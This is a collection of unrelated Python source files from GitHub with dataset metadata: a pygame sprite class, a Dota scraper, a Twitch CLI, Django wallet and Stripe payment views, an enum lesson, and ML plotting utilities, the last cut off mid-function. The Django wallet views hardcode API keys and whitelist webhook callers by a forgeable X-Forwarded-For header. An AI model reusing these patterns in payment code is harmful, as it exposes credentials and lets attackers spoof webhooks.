# created : 2021/9/28 0:30
import pygame
class Cointext():
def __init__(self,rect,reward,bshape):
self.images = [pygame.image.load('images/coinText.png').subsurface(i*36, 0, 36, 49) for i in range(0, 11)]
self.rect=rect
self.reward=reward
self.bshape=bshape
def display(self, screen):
count=0
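        # blit the digit sprites side by side; each glyph is 36px wide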
for i in self.change((self.reward*self.bshape)):
screen.blit(self.images[i], (self.rect[0]+count*36,self.rect[1]))
count+=1
def change(self, number):
l = list(map(int, str(number)))
        ##insert the 'X' glyph (sprite index 10) in front of the digits
l.insert(0,10)
return l | leemamas/fishgame | coinText.py | coinText.py | py | 701 | python | en | code | 8 | github-code | 1 | [
{
"api_name": "pygame.image.load",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "pygame.image",
"line_number": 8,
"usage_type": "attribute"
}
] |
39077417661 | import os
import requests
from bs4 import BeautifulSoup
from concurrent.futures import ThreadPoolExecutor
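# Windows-only console setup ("mode con" and "cls" are Windows shell commands)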
os.system("mode con cols=130 lines=4")
user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'
headers = {
'User-Agent': user_agent
}
def get_hero():
hero_name = []
hero_links = []
url = 'https://www.dotabuff.com/heroes'
response = requests.get(url, headers=headers, timeout=5)
html = response.content
soup = BeautifulSoup(html, 'html.parser')
links_temp = soup.select(".hero-grid a[href]")
for link in links_temp:
hero_links.append(link["href"])
for name in soup.find_all(class_="name"):
hero_name.append(name.text.strip())
return hero_name, hero_links
def scrape_hero(hero, link):
url = 'https://www.dotabuff.com'+link+'/counters'
response = requests.get(url, headers=headers, timeout=5)
html = response.content
soup = BeautifulSoup(html, 'lxml')
data = []
for tr in soup.find_all('tr'):
hero_name_elem = tr.find('td', {'class': 'cell-xlarge'})
if hero_name_elem:
hero_name = hero_name_elem.find('a').text
score = float(tr.find_all('td')[2].text.strip('%'))
win_rate = float(tr.find_all('td')[3].text.strip('%'))
data.append((score, hero_name, win_rate))
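    # flip the sign of the scraped scores, then shift them so the minimum
    # becomes zero, leaving non-negative values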
for i in range(len(data)):
score, hero_name, win_rate = data[i]
score = -score
data[i] = (score, hero_name, win_rate)
min_score = min([x[0] for x in data])
for i in range(len(data)):
score, hero_name, win_rate = data[i]
score += -min_score
data[i] = (score, hero_name, win_rate)
with open(f'database/{hero}.txt', 'w') as f:
        for score, hero_name, win_rate in data:
            f.write(f'{hero_name}: {score:.2f}, {win_rate}\n')
if __name__ == '__main__':
os.makedirs('database', exist_ok=True)
hero_names, links = get_hero()
with open("database/Heroes.txt", "w") as file:
for item in hero_names:
file.write(item + "\n")
total = len(links)
count = 0
with ThreadPoolExecutor(max_workers=10) as executor:
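        # NOTE: the progress bar advances when a task is submitted, not when it
        # finishes; the executor's context manager waits for all workers on exit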
for link in links:
executor.submit(scrape_hero, hero_names[count], link)
os.system("cls")
print('by Rizeru')
count += 1
progress = int(count / total * 100)
bar = '[' + '#' * progress + ' ' * (100 - progress) + ']'
print(f'Progress: {bar} {progress}% ({count}/{total})')
if count == total:
print('Recording...')
| ElRizeru/dota2picker | update.py | update.py | py | 2,657 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "os.system",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_numb... |
25476839440 | #!/usr/bin/env python3
import json
from argparse import ArgumentParser
from json import JSONDecodeError
from subprocess import call
from os.path import expanduser
from urllib.parse import urlparse
import requests
import sys
from past.builtins import raw_input
# call watch() if no arguments are supplied
WATCH_AS_DEFAULT = True
class Twitch(object):
_channel_list = []
_storage_file = expanduser("~/.twitch-channels")
def __init__(self):
self.load_channels()
def load_channels(self):
try:
self._channel_list = json.load(open(self._storage_file, 'r'))
except (JSONDecodeError, FileNotFoundError):
self.save_channels()
def save_channels(self):
json.dump(self._channel_list, open(self._storage_file, 'w'))
def add_channel(self, name: str):
name = name.lower()
if name not in self._channel_list:
self._channel_list.append(name.lower())
self.save_channels()
return True
else:
return False
def remove_channel(self, name: str):
if name in self._channel_list:
self._channel_list.remove(name.lower())
self.save_channels()
return True
else:
return False
@property
def channels(self):
return self._channel_list
def query_streams(channel_list):
print("Looking for currently streaming channels...")
online_streams = []
for channel in channel_list:
url = 'https://api.twitch.tv/kraken/streams/' + channel
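        # NOTE: api.twitch.tv/kraken is Twitch's legacy (v5) API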
response = requests.get(url)
# try:
s = response.json()
s = s["stream"] if "stream" in s else None
if not s:
continue
stream_url = s["channel"]["url"]
streamer = s["channel"]["display_name"]
game = s["game"]
stream_desc = s["channel"]["status"]
online_streams.append({'name': streamer, 'url': stream_url, 'game': game, 'desc': stream_desc})
return online_streams
def watch(streams):
if len(streams) > 0:
print("Channels online:")
i = 1
for s in streams:
print("({}) {}: [{}] {}".format(i, s['name'], s['game'], s['desc']))
print("{} {}".format(' ' * (2 + len(str(i))), s['url']))
i += 1
while True:
print()
            choice = raw_input("Enter number of stream to watch: ")
            try:
                stream_number = int(choice)
break
except ValueError:
print("Please specify the number of the stream to watch.")
continue
command = "livestreamer {} best".format(streams[stream_number - 1]['url'])
call(command.split(), shell=False)
else:
print("No streams online.")
def main():
parser = ArgumentParser(
description="Add twitch channels and watch them directly with your native video application.")
parser.add_argument("watch", nargs='?', help="Start watching streams!")
parser.add_argument("-a", "--add", help="Add one or more channels by name or twitch url", type=str, nargs='+')
parser.add_argument("-r", "--remove", help="Remove one or more channels by name", type=str, nargs='+')
parser.add_argument("-l", "--list", help="List all added channels", action='store_true')
args = parser.parse_args()
twitch = Twitch()
if args.add:
for channel in args.add:
parsed = urlparse(channel)
is_url = bool(parsed.scheme)
if is_url:
if "twitch.tv" not in parsed.netloc:
sys.exit("The url {} is invalid.".format(channel))
                channel = str(parsed.path).split('/')[1]
if twitch.add_channel(channel):
print("Added {} to the list of channels.".format(channel))
else:
print("{} is already in the list of channels.".format(channel))
if args.remove:
for channel in args.remove:
if twitch.remove_channel(channel):
print("Removed {} from the list of channels.".format(channel))
else:
print("{} is not in the list of channels. Nothing removed.".format(channel))
if args.list:
print('Your channels: ' + ', '.join(twitch.channels))
# default action
if args.watch or (not any(vars(args).values()) and WATCH_AS_DEFAULT):
if len(twitch.channels) == 0:
parser.print_help()
print()
print('You have not added any channels yet. Try\n twitch -a [NAME/URL]')
else:
# initialize
watch(query_streams(twitch.channels))
| JosXa/twitch-native-streaming | twitch/twitch.py | twitch.py | py | 4,750 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "os.path.expanduser",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "json.load",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "json.JSONDecodeError",
"line_number": 30,
"usage_type": "name"
},
{
"api_name": "json.dump",
"li... |
37336242441 | from math import pi
import pandas as pd
from bokeh.layouts import gridplot,row
from bokeh.io import output_file, save
from bokeh.palettes import Category20c
from bokeh.plotting import figure
from bokeh.transform import cumsum
def chart():
output_file("pie.html")
df = pd.read_csv("maggi.csv")
df2= pd.read_csv("pepsi.csv")
df3= pd.read_csv("cadbury.csv")
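    # each Name apparently carries a 4-character suffix that is sliced off
    # before splitting into tokens (an assumption based on the slicing below)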
locationsm=[loc[0:-4].split(" ") for loc in df['Name']]
locationsp=[loc[0:-4].split(" ") for loc in df2['Name']]
locationsc=[loc[0:-4].split(" ") for loc in df3['Name']]
countc=len(locationsc)
countm=len(locationsm)
countp=len(locationsp)
x = {
'maggi':countm,
'pepsi':countp,
'cadbury':countc
}
data = pd.Series(x).reset_index(name='value').rename(columns={'index':'pwp'})
pwp=data['pwp']
value=data['value']
print(data)
data['angle'] = data['value']/data['value'].sum() * 2*pi
data['color'] = Category20c[len(x)]#['yellow','blue']
p = figure(plot_height=450, title="Pie Chart", toolbar_location=None,
tools="hover", tooltips="@pwp: @value", x_range=(-0.5, 1.0))
p.wedge(x=0, y=1, radius=0.4,
start_angle=cumsum('angle', include_zero=True), end_angle=cumsum('angle'),
line_color="white", fill_color='color', legend='pwp', source=data)
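    # NOTE: newer Bokeh releases deprecate the legend= keyword in favor of
    # legend_field=/legend_label=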
p.axis.axis_label=None
p.axis.visible=False
p.grid.grid_line_color = None
print(data)
p2 = figure(x_range=pwp, plot_height=450, tools="hover" , title="PWP")
p2.vbar(x=pwp, top=value, width=0.9)
grid = row(p,p2)
#grid = gridplot([p, p2], ncols=2, plot_width=350, plot_height=350)
save(grid)
| dj5/Plastic-Waste-Profiling | Profilling tools/chart2.py | chart2.py | py | 1,631 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "bokeh.io.output_file",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv"... |
2738595022 | from django.http import HttpResponse, HttpResponseForbidden
from django.shortcuts import render, redirect, get_object_or_404
from django.db.transaction import atomic, non_atomic_requests
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_POST
from ipaddress import ip_address, ip_network
import json
from django.conf import settings
from django.contrib import messages
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
from .forms import UserRegistrationForm, CustomAuthForm, BVNForm
from .decorators import verified
from .api import WalletsClient
from .models import *
from cryptography.fernet import Fernet
# Create your views here.
wallet = WalletsClient(secret_key="hfucj5jatq8h", public_key="uvjqzm5xl6bw")
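# NOTE: the API keys above are hardcoded; in a real deployment they should be
# loaded from settings or environment variables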
fernet = Fernet(settings.ENCRYPTION_KEY)
def register(request):
form = UserRegistrationForm(request.POST or None)
if request.method == 'POST':
if form.is_valid():
new_user = form.save()
            messages.success(request, 'Account successfully created. You can now login')
return redirect('accounts:login')
return render(request, "accounts/register.html", context = {"form":form})
def login_user(request):
form = CustomAuthForm(request.POST or None)
if request.method == 'POST':
if form.is_valid():
cd = form.cleaned_data
user = authenticate(request, email = cd['email'], password=cd['password'])
if user is not None:
login(request, user)
return redirect(request.GET.get('next','accounts:dashboard'))
else:
messages.error(request, 'Account does not exist')
return render(request, "accounts/login.html", context = {"form":form})
@login_required
def logout_user(request):
logout(request)
return redirect("accounts:login")
@login_required
@verified
def dashboard(request):
wallet = get_object_or_404(Wallet, user=request.user)
return render(request, "dashboard.html", context={"wallet":wallet})
@login_required
def create_wallet(request):
form = BVNForm(request.POST or None)
if request.method == 'POST':
if form.is_valid():
cd = form.cleaned_data
user = request.user
bvn = cd["bvn"]
new_wallet = wallet.create_user_wallet(
first_name= user.first_name,
last_name= user.last_name,
email=user.email,
date_of_birth= user.date_of_birth.strftime('%Y-%m-%d'),
bvn= str(bvn)
)
if new_wallet["response"]["responseCode"] == '200':
user.verified = True
user.save()
Wallet.objects.create(
user = user,
balance = new_wallet["data"]["availableBalance"],
account_name = new_wallet["data"]["accountName"],
account_number = new_wallet["data"]["accountNumber"],
bank = new_wallet["data"]["bank"],
phone_number = new_wallet["data"]["phoneNumber"],
password = fernet.encrypt(new_wallet["data"]["password"].encode())
)
messages.success(request, "Account verified, wallet successfully created")
return redirect("accounts:dashboard")
else:
messages.error(request, new_wallet["response"]["message"])
return render(request, "accounts/bvn.html", context = {"form":form})
def make_transaction(request):
if request.method == 'POST':
try:
sender = request.POST.get('sender')
recipient = request.POST.get('recipient')
amount = request.POST.get('amount')
            with atomic():
                sender_obj = Payment.objects.get(user = sender)
                sender_obj.amount -= int(amount)
                sender_obj.save()
                recipient_obj = Payment.objects.get(user = recipient)
                recipient_obj.amount += int(amount)
                recipient_obj.save()
            messages.success(request, 'Your amount has been transferred')
        except Exception as e:
            print(e)
            messages.error(request, 'Something went wrong')
return redirect('/')
return render(request, 'home.html')
@csrf_exempt
@require_POST
def webhook(request):
whitelist_ip = "18.158.59.198"
forwarded_for = u'{}'.format(request.META.get('HTTP_X_FORWARDED_FOR'))
client_ip_address = ip_address(forwarded_for)
    if client_ip_address not in ip_network(whitelist_ip):
return HttpResponseForbidden('Permission denied.')
payload = json.loads(request.body)
try:
if payload['EventType'] == "BankTransferPayout":
pass
elif payload['EventType'] == "BankTransferFunding":
pass
else:
pass
return HttpResponse(status=200)
except:
if payload['TransactionType'] == "credit":
pass
elif payload['TransactionType'] == "debit":
pass
else:
pass
return HttpResponse(status=200)
# ---------- Stripe / DRF payment views ----------
from django.conf import settings
from django.shortcuts import get_object_or_404
from rest_framework.viewsets import ModelViewSet
from rest_framework.generics import RetrieveUpdateAPIView
from rest_framework.views import APIView
from rest_framework import status
from rest_framework.response import Response
import stripe
from payment.models import Payment
from payment.permissions import (
DoesOrderHaveAddress,
IsOrderPendingWhenCheckout,
IsPaymentByUser,
IsPaymentForOrderNotCompleted,
IsPaymentPending
)
from payment.serializers import CheckoutSerializer, PaymentSerializer
from orders.models import Order
from orders.permissions import IsOrderByBuyerOrAdmin
from payment.tasks import send_payment_success_email_task
stripe.api_key = settings.STRIPE_SECRET_KEY
class PaymentViewSet(ModelViewSet):
"""
CRUD payment for an order
"""
queryset = Payment.objects.all()
serializer_class = PaymentSerializer
permission_classes = [IsPaymentByUser]
def get_queryset(self):
res = super().get_queryset()
user = self.request.user
return res.filter(order__buyer=user)
def get_permissions(self):
if self.action in ('update', 'partial_update', 'destroy'):
self.permission_classes += [IsPaymentPending]
return super().get_permissions()
class CheckoutAPIView(RetrieveUpdateAPIView):
"""
Create, Retrieve, Update billing address, shipping address and payment of an order
"""
queryset = Order.objects.all()
serializer_class = CheckoutSerializer
permission_classes = [IsOrderByBuyerOrAdmin]
def get_permissions(self):
if self.request.method in ('PUT', 'PATCH'):
self.permission_classes += [IsOrderPendingWhenCheckout]
return super().get_permissions()
class StripeCheckoutSessionCreateAPIView(APIView):
"""
Create and return checkout session ID for order payment of type 'Stripe'
"""
permission_classes = (IsPaymentForOrderNotCompleted,
DoesOrderHaveAddress, )
def post(self, request, *args, **kwargs):
order = get_object_or_404(Order, id=self.kwargs.get('order_id'))
order_items = []
for order_item in order.order_items.all():
product = order_item.product
quantity = order_item.quantity
data = {
'price_data': {
'currency': 'usd',
'unit_amount_decimal': product.price,
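                    # NOTE: Stripe expects amounts in the smallest currency
                    # unit (cents for USD); product.price must match that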
'product_data': {
'name': product.name,
'description': product.desc,
'images': [f'{settings.BACKEND_DOMAIN}{product.image.url}']
}
},
'quantity': quantity
}
order_items.append(data)
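        # the order_id stored in metadata below lets the Stripe webhook map the
        # completed checkout session back to this Order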
checkout_session = stripe.checkout.Session.create(
payment_method_types=['card'],
line_items=order_items,
metadata={
"order_id": order.id
},
mode='payment',
success_url=settings.PAYMENT_SUCCESS_URL,
cancel_url=settings.PAYMENT_CANCEL_URL
)
return Response({'sessionId': checkout_session['id']}, status=status.HTTP_201_CREATED)
class StripeWebhookAPIView(APIView):
"""
Stripe webhook API view to handle checkout session completed and other events.
"""
def post(self, request, format=None):
payload = request.body
endpoint_secret = settings.STRIPE_WEBHOOK_SECRET
sig_header = request.META['HTTP_STRIPE_SIGNATURE']
event = None
try:
event = stripe.Webhook.construct_event(
payload, sig_header, endpoint_secret)
except ValueError as e:
return Response(status=status.HTTP_400_BAD_REQUEST)
except stripe.error.SignatureVerificationError as e:
return Response(status=status.HTTP_400_BAD_REQUEST)
if event['type'] == 'checkout.session.completed':
session = event['data']['object']
customer_email = session['customer_details']['email']
order_id = session['metadata']['order_id']
            print('Payment successful')
payment = get_object_or_404(Payment, order=order_id)
payment.status = 'C'
payment.save()
order = get_object_or_404(Order, id=order_id)
order.status = 'C'
order.save()
# TODO - Decrease product quantity
send_payment_success_email_task.delay(customer_email)
# Can handle other events here.
return Response(status=status.HTTP_200_OK) | Wizard-Fingerz/GreenPurseBackend | payment/views.py | views.py | py | 10,164 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "api.WalletsClient",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "cryptography.fernet.Fernet",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "django.conf.settings.ENCRYPTION_KEY",
"line_number": 23,
"usage_type": "attribute"
},
{
... |
6275958376 | #!/usr/local/bin/python
# coding: utf-8
"""
this file shows an example of creating a custom enumerated type in Python
since there is no built-in mechanism, enumerated types are created as subclasses
of the Enum class from the enum module
"""
import enum
@enum.unique # will not allow duplicate values
class Numbers(enum.IntEnum):
"""
    simply named constants that can be added and compared
"""
ZERO = 0
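    # enum.auto() assigns the next integer value automatically (1, 2, ...)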
ONE = enum.auto()
TWO = enum.auto()
THREE = enum.auto()
FOUR = enum.auto()
FIVE = enum.auto()
SIX = enum.auto()
SEVEN = enum.auto()
EIGHT = enum.auto()
NINE = enum.auto()
TEN = enum.auto()
    # ZEROO = 0 # with the @enum.unique decorator this would not pass, since ZERO already exists
# ==============================================================================
def main():
"""
    example of working with the enumerated type
"""
var_one = Numbers.ONE
if var_one in Numbers:
        print(
            f"var_one = {var_one} is one of Numbers, its value: {var_one.value}"
        )
var_two = Numbers.TWO
if var_two in Numbers:
        print(
            f"var_two = {var_two} is one of Numbers, its value: {var_two.value}"
        )
if var_two > var_one:
print(f"var_two is greater than var_one")
else:
print(f"var_one is greater than var_two wtf???")
print(f"var_one + var_two = {(var_one + var_two)}")
    print("this is an IntEnum quirk, since Numbers.THREE might have been expected")
var_six = Numbers.SIX
print(f"var_six + 1 is {var_six + 1}")
print(f"Numbers(3) is {Numbers(3)}")
    print(f"[overflow] var_six + var_six = {(var_six + var_six)}, result type: {type(var_six + var_six)}")
    print("The result of arithmetic operations on IntEnum subclasses is a plain int")
# ===============================================================================
if __name__ == "__main__":
main()
| amtsu/team22 | users/sivanov/lessons/lesson_27_enum/incrementing_intenum.py | incrementing_intenum.py | py | 2,382 | python | ru | code | 5 | github-code | 1 | [
{
"api_name": "enum.IntEnum",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "enum.auto",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "enum.auto",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "enum.auto",
"line_number": ... |
25889695431 | # Custom module to assess performance of ML model
# Author: Rupinder Singh (Oct. 25, 2016)
from __future__ import division
import matplotlib.pyplot as plt
from sklearn.metrics import auc,r2_score
import numpy as np
import pandas as pd
from scipy.stats import sem
from mpl_toolkits.axes_grid1 import make_axes_locatable
from sklearn.metrics import classification_report
import os
def get_model_coef(model,columns,export_fn='./Data/model_coef.csv'):
# Returns coefficient of scikit learn model
# model: scikit model object
# columns: array of strings associated with each coefficient
# export_fn: filename to export csv of coefficients
i = pd.Series(model.intercept_, index=['intercept'])
c = pd.Series(model.coef_[0,:], index=columns)
model_coef = pd.concat([i,c]).sort_values()
model_coef = model_coef[model_coef != 0] #remove zero coef
model_coef.to_csv(export_fn)
return model_coef
def compute_classification_score(model,y_train,X_train,y_test,X_test,event):
y_pred = model.predict(X_test)
target_names = ['no_'+event, event]
print(classification_report(y_test, y_pred, target_names=target_names))
acc_train = model.score(X_train,y_train)
acc_test = model.score(X_test,y_test)
tbl=[['','Train','Test'],
['Incidence','{0:.2f}%'.format(y_train.mean()*100),'{0:.2f}%'.format(y_test.mean()*100)],
['Actual ACC','{0:.2f}'.format(acc_train),'{0:.2f}'.format(acc_test)]]
return tbl
def compute_rsq(y_pred,y_true):
"""
Computes coefficient of determination
Inputs are two numpy arrays
"""
    # manual computation kept for reference; r2_score returns the same value
    # ss_res = sum((y_true - y_pred)**2)
    # ss_tot = sum((y_true - y_true.mean())**2)
    # rsq = 1 - ss_res/ss_tot
    rsq = r2_score(y_true, y_pred)
    return rsq
def compute_metrics(y_pred,y_true):
# Function computes metrics using predicted and true labels
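    # tnr/fpr/fnr/tpr are rates over actual negatives/positives, pr is precision,
    # and ptp/pfp/ptn/pfn are fractions of the whole sample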
ap = (y_true==1).sum() #actual positives
an = (y_true==0).sum() #actual negatives
pp = (y_pred==1).sum() #predicted positives
pn = (y_pred==0).sum() #predicted negatives
tn = ((y_pred==0) & (y_true==0)).sum()
fp = ((y_pred==1) & (y_true==0)).sum()
fn = ((y_pred==0) & (y_true==1)).sum()
tp = ((y_pred==1) & (y_true==1)).sum()
tnr = tn / an
fpr = fp / an
fnr = fn / ap
tpr = tp / ap
pr = tp / pp
ptp = tp/(ap+an)
pfp = fp/(ap+an)
ptn = tn/(ap+an)
pfn = fn/(ap+an)
return tnr,fpr,fnr,tpr,pr,ptp,pfp,ptn,pfn
def model_metrics(model,y_true,X_true,Nsets):
# Function produces metric arrarys that have nth rows and nsplits columns,
# where nth is the number of thresholds used and Nsets is number of test sets created
n=int(y_true.shape[0]/Nsets)
indices = np.random.permutation(y_true.shape[0])
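    # carve the shuffled indices into Nsets disjoint folds of size n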
idx = ()
for i in range(0,Nsets):
idx += (indices[i*n:(i+1)*n],)
thL = np.arange(0,1.01,0.01) # list of thresholds
Nrows = len(thL)
tnrL=np.zeros((Nrows,Nsets))
fprL=np.zeros((Nrows,Nsets))
fnrL=np.zeros((Nrows,Nsets))
tprL=np.zeros((Nrows,Nsets))
PrL=np.zeros((Nrows,Nsets))
Ptp=np.zeros((Nrows,Nsets))
Pfp=np.zeros((Nrows,Nsets))
Ptn=np.zeros((Nrows,Nsets))
Pfn=np.zeros((Nrows,Nsets))
n = 0
for idx_n in idx:
yprob = model.predict_proba(X_true.values[idx_n,:]) #issue
m = 0
for th in thL:
y_pred=yprob[:,1]>th
(tnrL[m,n],fprL[m,n],fnrL[m,n],tprL[m,n],PrL[m,n],\
Ptp[m,n],Pfp[m,n],Ptn[m,n],Pfn[m,n])=compute_metrics(y_pred,y_true.values[idx_n])
m+=1
n+=1
PrL[np.isnan(PrL)] = 0 # only needed for this as pp could be 0
return thL,tnrL,fprL,fnrL,tprL,PrL,Ptp,Pfp,Ptn,Pfn
def update_plot_parameters(fnt_sz=14,lbl_sz=16):
plot_parameters = {'font.size': fnt_sz,'text.usetex':True,'axes.titlesize':lbl_sz,
'legend.frameon':True,'legend.framealpha':1,'legend.fontsize':fnt_sz,
'axes.labelsize':lbl_sz,'axes.facecolor':'white','axes.edgecolor':'lightgray',
'axes.linewidth':1.0,'axes.grid':True,
'grid.color':'lightgray','figure.edgecolor':(1,1,1,1),
'xtick.labelsize':fnt_sz,'ytick.labelsize':fnt_sz}
plt.rcParams.update(plot_parameters)
def compute_savings(Ptp,Pfp,parameters={'eta':0.55,'Ci':104,'Ce':14393,'Cne':5840},confidence=1.95):
# Computes expected cost savings using probability of true-positive (Ptp),
# probability of false-positive (Pfp), probability of successful intervention (eta),
# cost of intervention (Ci), cost of event (Ce), cost of no event (Cne)
Nrows,Nsets = Ptp.shape
eta = parameters['eta']; Ci = parameters['Ci']; Ce = parameters['Ce']; Cne = parameters['Cne']
csL = np.zeros((Nrows,Nsets))
for i in range(0,Nsets):
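        # expected saving = P(tp)*eta*(event cost - non-event cost)
        #                   - intervention cost for every flagged case (tp + fp)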
csL[:,i]=Ptp[:,i]*eta*(Ce-Cne)-(Ptp[:,i]+Pfp[:,i])*Ci
csM=csL.mean(axis=1)
csE=sem(csL,axis=1)*confidence
return csL,csM,csE
def plot_model_metrics(thL,fprL,tprL,PrL,export_fn='./Figures/model_metrics.eps',confidence=1.95):
Nrows,Nsets = tprL.shape #number of columns equal number of test sets
th = 0.5
    i = np.where(np.isclose(thL, th))
fm=fprL.mean(axis=1)[i]
tm=tprL.mean(axis=1)[i]
pm=PrL.mean(axis=1)[i]
fe=sem(fprL,axis=1)[i]*confidence
te=sem(tprL,axis=1)[i]*confidence
pe=sem(PrL,axis=1)[i]*confidence
fnt_sz=14; lbl_sz=16;
update_plot_parameters(fnt_sz=fnt_sz,lbl_sz=lbl_sz)
fig,ax = plt.subplots(1,1,sharex=True,sharey=False,figsize=[15,8])
plt.tight_layout(pad=2, w_pad=5, h_pad=0)
for n in range(0,Nsets):
ax.plot(thL,tprL[:,n],label=None,
linestyle='--',color='grey')
ax.plot(thL,fprL[:,n],label=None,
linestyle='--',color='grey')
ax.plot(thL,PrL[:,n],label=None,
linestyle='--',color='grey')
ax.plot(thL,tprL.mean(axis=1),label=r'recall',
linestyle='-',color='black')
ax.plot(thL,fprL.mean(axis=1),label=r'fpr',
linestyle='-',color='black')
ax.plot(thL,PrL.mean(axis=1),label=r'precision',
linestyle='-',color='black')
ax.set_ylabel('rate')
ax.set_xlabel('threshold')
#Annotation Shifts
scalex = 0.03*(np.max(thL)-np.min(thL))
scaley = 0.03*(1-0)
ax.annotate('*',(th,tm),backgroundcolor='white',fontsize=fnt_sz+10,alpha=0.8)
ax.annotate('*',(th,fm),backgroundcolor='white',fontsize=fnt_sz+10,alpha=0.8)
ax.annotate('*',(th,pm),backgroundcolor='white',fontsize=fnt_sz+10,alpha=0.8)
ax.annotate('recall ($%.2f \pm %.2f$)'%(tm,te),(th-scalex,tm-scaley),
fontsize=fnt_sz,backgroundcolor='white',alpha=0.8)
ax.annotate('fpr ($%.2f \pm %.2f$)'%(fm,fe),(th-scalex,fm-scaley),
fontsize=fnt_sz,backgroundcolor='white',alpha=0.8)
ax.annotate('precision ($%.2f \pm %.2f$)'%(pm,pe),(th-scalex,pm-scaley),
fontsize=fnt_sz,backgroundcolor='white',alpha=0.8)
directory = os.path.dirname(export_fn) #create directory if it doesn't exist
if not os.path.exists(directory):
os.makedirs(directory)
plt.savefig(export_fn, format='eps', dpi=1000,facecolor=fig.get_facecolor(), edgecolor='none')
def plot_roc_roi(thL,fprL,tprL,Ptp,Pfp,export_fn='./Figures/roc_savings.eps',parameters={'eta':0.55,'Ci':104,'Ce':14393,'Cne':5840},confidence=1.95):
Nrows,Nsets = tprL.shape #number of columns equal number of test sets
fnt_sz=14; lbl_sz=16;
update_plot_parameters(fnt_sz=fnt_sz,lbl_sz=lbl_sz)
fig,ax = plt.subplots(1,2,sharex=True,sharey=False,figsize=[15,8])
plt.tight_layout(pad=2, w_pad=5, h_pad=0)
# ROI
csL,csM,csE = compute_savings(Ptp,Pfp,parameters=parameters)
j=np.argmax(csM)
th = thL[j] #threshold for annotation
for i in range(0,Nsets):
ax[1].plot(thL,csL[:,i],label='TS%i ($%.2f$, $\$%.0f$)'%(i+1,thL[j],csL[j,i]),
linestyle='--',color='grey')
ax[1].plot(thL,csM,label='TSM ($%.2f$, $\$%.0f\pm%.0f$)'%(thL[j],csM[j],csE[j]),
linestyle='-',color='black')
ax[1].axvline(th,linestyle=':',color='gray')
ax[1].legend(loc='lower right')
ax[1].set_ylabel(r'$E(c_{saving})$')
ax[1].set_xlabel(r'Threshold ($E(c_i) = \$%.f$, $\eta = %.2f$)'%(parameters['Ci'],parameters['eta']))
# ROC
aucL = np.zeros((Nsets,1))
for i in range(0,Nsets):
aucL[i]=auc(fprL[:,i], tprL[:,i])
aucM=auc(fprL.mean(axis=1), tprL.mean(axis=1))
aucE=sem(aucL)*confidence
fm=fprL.mean(axis=1)[j]
tm=tprL.mean(axis=1)[j]
fe=sem(fprL,axis=1)[j]*confidence
te=sem(tprL,axis=1)[j]*confidence
for i in range(0,Nsets):
ax[0].plot(fprL[:,i],tprL[:,i],label='TS%i ($%.2f$)'%(i+1,aucL[i]),
linestyle='--',color='grey')
ax[0].plot(fprL.mean(axis=1),tprL.mean(axis=1),label=r'TSM ($%.2f\pm%.2f$)'%(aucM,aucE),
linestyle='-',color='black')
ax[0].legend(loc='lower right')
ax[0].set_ylabel('recall (tpr)')
ax[0].set_xlabel('1-specificity (fpr)')
#Annotation Shifts
scalex = 0.03*(1-0)
scaley = 0.03*(1-0)
ax[0].annotate('*',(fm,tm),backgroundcolor='white',fontsize=fnt_sz+10,alpha=0.8)
ax[0].annotate('($%.2f \pm %.2f, %.2f \pm %.2f$)'%(fm,fe,tm,te),(fm-scalex,tm-scaley),
fontsize=fnt_sz,backgroundcolor='white',alpha=0.8)
directory = os.path.dirname(export_fn) #create directory if it doesn't exist
if not os.path.exists(directory):
os.makedirs(directory)
plt.savefig(export_fn, format='eps', dpi=1000,facecolor=fig.get_facecolor(), edgecolor='none')
def plot_prob_roi(thL,Ptp,Pfp,export_fn='./Figure/roc_savings.eps',parameters={'eta':0.55,'Ci':104,'Ce':14393,'Cne':5840},confidence=1.95):
Nrows,Nsets = Ptp.shape #number of columns equal number of test sets
fnt_sz=14; lbl_sz=16;
update_plot_parameters(fnt_sz=fnt_sz,lbl_sz=lbl_sz)
fig,ax = plt.subplots(1,2,sharex=True,sharey=False,figsize=[15,8])
cur_axes = plt.gca()
cur_axes.axes.get_xaxis().set_visible(True)
cur_axes.axes.get_yaxis().set_visible(True)
plt.tight_layout(pad=2, w_pad=5, h_pad=0)
# ROI
csL,csM,csE = compute_savings(Ptp,Pfp,parameters=parameters)
j=np.argmax(csM)
th = thL[j] #threshold for annotation
for i in range(0,Nsets):
ax[1].plot(thL,csL[:,i],label='TS%i ($%.2f$, $\$%.0f$)'%(i+1,thL[j],csL[j,i]),
linestyle='--',color='grey')
ax[1].plot(thL,csM,label='TSM ($%.2f$, $\$%.0f\pm%.0f$)'%(thL[j],csM[j],csE[j]),
linestyle='-',color='black')
ax[1].axvline(th,linestyle=':',color='gray')
leg = ax[1].legend(loc='lower right')
ax[1].set_ylabel(r'$E(c_{saving})$')
ax[1].set_xlabel(r'Threshold ($E(c_i) = \$%.f$, $\eta = %.2f$)'%(parameters['Ci'],parameters['eta']))
aucL = np.zeros((Nsets,1))
for i in range(0,Nsets):
aucL[i]=auc(Pfp[:,i], Ptp[:,i])
aucM=auc(Pfp.mean(axis=1), Ptp.mean(axis=1))
aucE=sem(aucL)*confidence
# Probabilites
fm=Pfp.mean(axis=1)[j]
tm=Ptp.mean(axis=1)[j]
fe=sem(Pfp,axis=1)[j]*confidence
